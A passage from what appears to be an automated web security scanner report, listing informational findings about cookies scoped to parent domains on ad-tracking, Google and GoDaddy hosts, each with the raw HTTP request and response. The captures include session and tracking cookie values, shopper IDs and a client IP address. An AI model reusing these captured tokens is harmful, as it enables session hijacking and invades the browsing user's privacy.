000000086u0210telqyjdy000000016u0114bxlqwj0f000000046u0214bulqtqj10000000b6u021cyqlqtqj10000000b6u020huxlqtqj10000000b6u0216d5lqwj0f000000046u02; Domain=media6degrees.com; Expires=Thu, 01-Mar-2012 17:32:22 GMT; Path=/
Location: http://cm.g.doubleclick.net/pixel?nid=media6degrees
Content-Length: 0
Date: Sat, 03 Sep 2011 17:32:22 GMT
Connection: close


10.27. http://d7.zedo.com/img/bh.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /img/bh.gif

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /img/bh.gif?n=826&g=20&a=121&s=$t&l=1&t=i&e=1 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://login.dotomi.com/ucm/UCMController?dtm_com=28&dtm_fid=101&dtm_cid=2304&dtm_cmagic=e6c2dc&dtm_format=5&cli_promo_id=4&dtm_user_id=&dtmc_user_type=NEW&dtmc_product_type=Domain&dtmc_product_id=TTN%3A%20Domains%3A%20Search%3A%20Taken&dtmc_domain_name=xss.com&dtm_items=&dtmc_domain_status=TAKEN&dtmc_domain_variations=xss.la&dtmc_source=WWW000000000W&dtmc_ref=http%3A//www.register.com/&dtmc_loc=http%3A//www.register.com/domain/searchresults.rcmx%3Fwebmetrics%3Dnull%26searchOrigin%3Dhomepage%26domain%3Dxss%26selectedTLDs%3D.com%26x%3D0%26y%3D0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 90
Content-Type: image/gif
Set-Cookie: ZFFAbh=977B826,20|121_977#365;expires=Fri, 02 Dec 2011 21:40:25 GMT;domain=.zedo.com;path=/;
Set-Cookie: ZFFBbh=977B826,20|121_977#0;expires=Sun, 02 Sep 2012 21:40:25 GMT;domain=.zedo.com;path=/;
ETag: "3a9d58c-de5c-4a8e0f9fb9dc0"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=24701
Expires: Sun, 04 Sep 2011 04:32:06 GMT
Date: Sat, 03 Sep 2011 21:40:25 GMT
Connection: close

GIF89a.............!.......,...........D..;



10.28. http://d7.zedo.com/img/bh.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /img/bh.gif

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /img/bh.gif?n=809&g=20&a=3&s=1&t=i HTTP/1.1
Host: d7.zedo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://login.dotomi.com/ucm/UCMController?dtm_com=28&dtm_fid=101&dtm_cid=2304&dtm_cmagic=e6c2dc&dtm_format=5&cli_promo_id=1&dtm_user_id=&dtmc_user_type=NEW&dtmc_product_type=Home&dtmc_product_id=TTN%3A%20Home&dtmc_domain_name=&dtm_items=&dtmc_domain_status=&dtmc_domain_variations=&dtmc_source=SEO000000000W&dtmc_ref=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&dtmc_loc=http%3A//www.register.com/
Cookie: FFgeo=5386156; ZFFBbh=955B826,20|633_962#7Z695_955#5Z332_950#4; ZEDOIDA=mLs5ThcyantsGCRD8ld6EMRU~080311; ZFFAbh=946B826,20|633_962#381Z695_955#374Z332_950#369; FFAbh=950B809,20|10_1#365:305,20|458_1#371Z145_2#371; FFBbh=962B305,20|145_2#3Z458_1#0:809,20|10_1#0; ZEDOIDX=5

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 47
Content-Type: image/gif
Set-Cookie: FFAbh=950B809,20|3_2#392Z10_1#365:305,20|458_1#371Z145_2#371;expires=Fri, 02 Dec 2011 21:56:38 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFBbh=962B809,20|3_2#30Z10_1#0:305,20|145_2#3Z458_1#0;expires=Sun, 02 Sep 2012 21:56:38 GMT;domain=.zedo.com;path=/;
ETag: "1b6340a-de5c-4a8e0f9fb9dc0"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=14707
Expires: Sun, 04 Sep 2011 02:01:45 GMT
Date: Sat, 03 Sep 2011 21:56:38 GMT
Connection: close

GIF89a.............!.......,...........D..;



10.29. http://ds.addthis.com/red/psi/sites/vasco.com/p.json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/vasco.com/p.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/psi/sites/vasco.com/p.json?callback=_ate.ad.hpr&uid=4e5e3f1ae3fd7427&url=http%3A%2F%2Fvasco.com%2Fcompany%2Fpress_room%2Fnews_archive%2F2011%2Fnews_diginotar_reports_security_incident.aspx&ref=http%3A%2F%2Fvasco.com%2F&1wh4476 HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh52.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; dt=X; di=%7B%7D..1314983342.10R|1314983342.1FE|1314983342.1OD|1314983342.60|1314983342.1EY; psc=4; uid=4e5e3f1ae3fd7427; uvc=17|35; uit=1

Response

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Length: 157
Content-Type: text/html
Set-Cookie: bt=; Domain=.addthis.com; Expires=Sat, 03 Sep 2011 17:32:22 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Mon, 03 Oct 2011 17:32:22 GMT; Path=/
Set-Cookie: di=%7B%7D..1315071141.10R|1315071142.1WV|1315071141.1FE|1314983342.1OD|1315071141.60|1315071141.1EY; Domain=.addthis.com; Expires=Mon, 02-Sep-2013 17:32:21 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Sat, 03 Sep 2011 17:32:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 03 Sep 2011 17:32:22 GMT
Connection: close
Vary: Accept-Encoding

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (500 Internal Server Error) has occured in response to this request.
</BODY>
</HTML>

10.30. http://ib.adnxs.com/getuid

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /getuid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /getuid?http%3A%2F%2Fcf.addthis.com%2Fred%2Fusync%3Fpid%3D6%26puid%3D%24UID HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh52.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid2=6422714091563403120; icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; anj=Kfu=8fG10Qcvjr/?0P(*AuB-u**g1:XICjmEi'/29uJ21AU+]TP1m(hR)h523xzi'/4ZgI!6aZWx4#ZcNMkm2UReP=`CLdA!r):#o^)TD!vV^w#5O?0/><0pV3eGELw=b5$yyfs8q9<J.UiYhE029Q'Zi)hc5#t:

Response

HTTP/1.1 302 Moved
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sun, 04-Sep-2011 17:34:45 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6422714091563403120; path=/; expires=Fri, 02-Dec-2011 17:34:45 GMT; domain=.adnxs.com; HttpOnly
Location: http://cf.addthis.com/red/usync?pid=6&puid=6422714091563403120
Date: Sat, 03 Sep 2011 17:34:45 GMT
Content-Length: 0


10.31. http://ib.adnxs.com/seg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /seg

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /seg?add=165828&t=2 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.cheapssls.com/?subcats=Y&status=A&pshort=Y&pfull=Y&pname=Y&pkeywords=Y&search_performed=Y&cid=0&q=xss&x=0&y=0&dispatch=products.search
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; anj=Kfu=8fG10Qcvjr/?0P(*AuB-u**g1:XICjmEi'/29uJ21V.fsQSr=z6NGgptu>0_YXw_T%?9*a5p4!1-waB6<#uuy!Q#lx*XEB@`D:dkd7>T]xMWu7a9T1Y1.^NXLlK839uon7j94%gch60)-@(Z_[!1jn1vzCbx; sess=1; uuid2=6422714091563403120

Response

HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sun, 04-Sep-2011 21:31:05 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6422714091563403120; path=/; expires=Fri, 02-Dec-2011 21:31:05 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG5`$cvjr/?0P(*AuB-u**g1:XIF)WEi'/29uJ21V)`B-9`/7Ko9MUt3xzi'/4ZgI!6aZWx4#ZcXfR=T@A^0Y`4jmC=WN@m!nW>/7tnkB5j%8zT+4q#daaX4Tjg6O#PQRq%^).H=M=x0Xe3#2vn<%BNdgF1+j)nl2fp%0; path=/; expires=Fri, 02-Dec-2011 21:31:05 GMT; domain=.adnxs.com; HttpOnly
Location: http://cm.g.doubleclick.net/pixel?nid=appnexus1
Date: Sat, 03 Sep 2011 21:31:05 GMT
Content-Length: 0


10.32. http://ib.adnxs.com/setuid

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /setuid

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /setuid?entity=34&code=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://login.dotomi.com/ucm/UCMController?dtm_com=28&dtm_fid=101&dtm_cid=2304&dtm_cmagic=e6c2dc&dtm_format=5&cli_promo_id=1&dtm_user_id=&dtmc_user_type=NEW&dtmc_product_type=Home&dtmc_product_id=TTN%3A%20Home&dtmc_domain_name=&dtm_items=&dtmc_domain_status=&dtmc_domain_variations=&dtmc_source=WWW000000000W&dtmc_ref=&dtmc_loc=http%3A//www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; anj=Kfu=8fG10Qcvjr/?0P(*AuB-u**g1:XICjmEi'/29uJ21AU+]TP1m(hR)h523xzi'/4ZgI!6aZWx4#ZcNMkm2UReP=`CLdA!r):#o^)TD!vV^w#5O?0/><0pV3eGELw=b5$yyfs8q9<J.UiYhE029Q'Zi)hc5#t:; sess=1; uuid2=6422714091563403120

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sun, 04-Sep-2011 21:33:40 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6422714091563403120; path=/; expires=Fri, 02-Dec-2011 21:33:40 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7*@E:3F.0s]#%2L_'x%SEV/hnK7#!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SoJ1?kmIqrI`B1!pj[=8$^@U1YIFBG7*NsKA-5?XJ>2v6N)if.pXdfOB!(4(%Pq$T60KmpWC[?NT!^`u7i*QgR(K-EF4/<<!tv0qoKKPh=r*T>2(K$r!f#D(i; path=/; expires=Fri, 02-Dec-2011 21:33:40 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Content-Type: image/gif
Date: Sat, 03 Sep 2011 21:33:40 GMT

GIF89a.............!.......,........@..L..;

10.33. http://id.google.com/verify/EAAAAB18MDCNmAWnZ6ZMKxFbyXM.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAAB18MDCNmAWnZ6ZMKxFbyXM.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAB18MDCNmAWnZ6ZMKxFbyXM.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/blank.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=50=u5vZn_NDJXw_46xb3szsC8KHo7mSQ9vRO8iZmFjxYw=YsUbv9G_3-MoPapq; PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=dYdXb1ScZWRJMvBrNEHDfLjfOocGh7bNH6BGA3vRVqKYi3SPaS4s8VflEEZyzxRJp0RFQHbwIFv7qAsJNvrMyJFPuL9b0_3fjdGh0Mx_82XLAISmwar_I3OOxUz-5M-7

Response

HTTP/1.1 200 OK
Set-Cookie: NID=50=weQTGvlcDANTxV5wF-7ErWL28T_eIde2eHArK6Ro0Zy54tkidlIV7dmvnTL0c6xSXtweleFZDrG22uhTYX0LPoqeazjheLUerXqIXctalXVtgPQlJij9RupAr8rvIdFS; expires=Sun, 04-Mar-2012 21:29:07 GMT; path=/; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Sat, 03 Sep 2011 21:29:07 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

10.34. http://id.google.com/verify/EAAAADMsrH8QTeh7gqteYecpwnc.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAADMsrH8QTeh7gqteYecpwnc.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAADMsrH8QTeh7gqteYecpwnc.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=compression+dotnetnuke
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=50=gYkfLrkEFRObhJ_AMsvalPNTB0r00AJPRsl-2PCVwA=MlhIz5-TO3pmQU2Z; PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=aYJjaoJUNshldk3FUs-vgsnQPJuDrjBt3LzHNFQ3N3bLmMufnkOZ7iX2MROGgKXHYJfo8-7QDL4Tqk2kAaYx2lrsnOlscEXcdgi_FMD_BsfBB0Tnyn77h3FbX1c9opy9

Response

HTTP/1.1 200 OK
Set-Cookie: NID=50=dYdXb1ScZWRJMvBrNEHDfLjfOocGh7bNH6BGA3vRVqKYi3SPaS4s8VflEEZyzxRJp0RFQHbwIFv7qAsJNvrMyJFPuL9b0_3fjdGh0Mx_82XLAISmwar_I3OOxUz-5M-7; expires=Sun, 04-Mar-2012 15:05:05 GMT; path=/; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Sat, 03 Sep 2011 15:05:05 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

10.35. http://id.google.com/verify/EAAAALzxzy-p1oHxNaVBpSOT2kM.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAALzxzy-p1oHxNaVBpSOT2kM.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAALzxzy-p1oHxNaVBpSOT2kM.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ssl+certificates
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=50=gYkfLrkEFRObhJ_AMsvalPNTB0r00AJPRsl-2PCVwA=MlhIz5-TO3pmQU2Z; PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=dYdXb1ScZWRJMvBrNEHDfLjfOocGh7bNH6BGA3vRVqKYi3SPaS4s8VflEEZyzxRJp0RFQHbwIFv7qAsJNvrMyJFPuL9b0_3fjdGh0Mx_82XLAISmwar_I3OOxUz-5M-7

Response

HTTP/1.1 200 OK
Set-Cookie: SNID=50=u5vZn_NDJXw_46xb3szsC8KHo7mSQ9vRO8iZmFjxYw=YsUbv9G_3-MoPapq; expires=Sun, 04-Mar-2012 21:28:32 GMT; path=/verify; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Sat, 03 Sep 2011 21:28:32 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

10.36. http://idcs.interclick.com/Segment.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://idcs.interclick.com
Path:   /Segment.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Segment.aspx?sid=46b8b784-19e0-4400-8cdb-f6284ddc3d9a HTTP/1.1
Host: idcs.interclick.com
Proxy-Connection: keep-alive
Referer: http://login.dotomi.com/ucm/UCMController?dtm_com=28&dtm_fid=101&dtm_cid=2304&dtm_cmagic=e6c2dc&dtm_format=5&cli_promo_id=1&dtm_user_id=&dtmc_user_type=NEW&dtmc_product_type=Home&dtmc_product_id=TTN%3A%20Home&dtmc_domain_name=&dtm_items=&dtmc_domain_status=&dtmc_domain_variations=&dtmc_source=WWW000000000W&dtmc_ref=&dtmc_loc=http%3A//www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T=1; uid=u=ef156cf5-d9a2-4704-9dc3-362f08c1bcb4; sgm=12290=734380

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: sgm=12290=734380&7435=734382; domain=.interclick.com; expires=Fri, 03-Sep-2021 21:34:02 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Sat, 03 Sep 2011 21:34:02 GMT

GIF89a.............!.......,...........D..;

10.37. https://idp.godaddy.com/login.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://idp.godaddy.com
Path:   /login.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /login.aspx?SPKey=GDMYA-M1PWMYAWEB006&redirect=true&myaurl=%2fdefault.aspx HTTP/1.1
Host: idp.godaddy.com
Connection: keep-alive
Referer: https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB109&target=http%3A%2F%2Fwww.godaddy.com%2Fssl%2Fssl-certificates.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currencypopin1=cdisplaypopin=false; SplitValue1=24; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; domainYardVal=%2D1; serverVersion=A; preferences1=_sid=yishkaeegbnbqewgxixgkfpfeekbejsf&dataCenterCode=US&gdshop_currencyType=USD; BlueLithium_ssl=hbuftbbciczbydeibifgffggtihijizc; ASP.NET_SessionId=pwylm3umzkrcsc3bnf5ymbnz; pathway=4f057259-4645-4223-96aa-98d6262a1c68; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pagecount=3; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; adc1=US; currency1=potableSourceStr=USD; traffic=; ShopperId1=miaasiuadhnegiagkeyasfgdujffpbkb

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 00:30:45 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: https://mya.godaddy.com/login_redirect.aspx?idpinfo=none&SPKey=GDMYA-M1PWMYAWEB006&myaurl=%2fdefault.aspx
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 04-Sep-2012 00:30:45 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 04-Sep-2012 00:30:45 GMT; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: traffic=cookies=1&referrer=http://www.godaddy.com/affiliates/affiliate-program.aspx&sitename=www.godaddy.com&page=/shared/video/videos.aspx&server=M1PWCORPWEB101&status=200 OK&querystring=ci=22398&show_vid=affiliatesproductoverview&pagetype=affiliate&callback=popUpFill&targetDivId=quickTourDiv&popUpFill=jsonp1315095995209&_=1315096014458%26hpGoogleStatic%3d1&shopper=46215684&privatelabelid=1&isc="&clientip=50.23.123.106&referringpath=ca8f10ab-5a85-4bac-9b43-0ef09fae1617&referringdomain=&split=13; domain=godaddy.com; path=/
Set-Cookie: traffic=cookies=1&referrer=http://www.godaddy.com/affiliates/affiliate-program.aspx&sitename=www.godaddy.com&page=/shared/video/videos.aspx&server=M1PWCORPWEB101&status=200 OK&querystring=ci=22398&show_vid=affiliatesproductoverview&pagetype=affiliate&callback=popUpFill&targetDivId=quickTourDiv&popUpFill=jsonp1315095995209&_=1315096014458%26hpGoogleStatic%3d1&shopper=46215684&privatelabelid=1&isc="&clientip=50.23.123.106&referringpath=ca8f10ab-5a85-4bac-9b43-0ef09fae1617&referringdomain=&split=13; domain=godaddy.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 230

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://mya.godaddy.com/login_redirect.aspx?idpinfo=none&amp;SPKey=GDMYA-M1PWMYAWEB006&amp;myaurl=%2fdefault.aspx">he
...[SNIP]...

10.38. https://idp.godaddy.com/retrieveaccount.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://idp.godaddy.com
Path:   /retrieveaccount.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /retrieveaccount.aspx?ci=9107&spkey=GDSWNET-M1PWCORPWEB101 HTTP/1.1
Host: idp.godaddy.com
Connection: keep-alive
Referer: https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB101&target=http%3A%2F%2Fwww.godaddy.com%2Faffiliates%2Faffiliate-program.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currencypopin1=cdisplaypopin=false; SplitValue1=24; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; domainYardVal=%2D1; serverVersion=A; preferences1=_sid=yishkaeegbnbqewgxixgkfpfeekbejsf&dataCenterCode=US&gdshop_currencyType=USD; BlueLithium_ssl=hbuftbbciczbydeibifgffggtihijizc; ASP.NET_SessionId=pwylm3umzkrcsc3bnf5ymbnz; pathway=4f057259-4645-4223-96aa-98d6262a1c68; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; ShopperId1=oemhlbvbcgufsjahmchddfndphwizcii; pagecount=3; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; adc1=US; currency1=potableSourceStr=USD; traffic=

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:27:41 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 04-Sep-2012 00:27:41 GMT; path=/
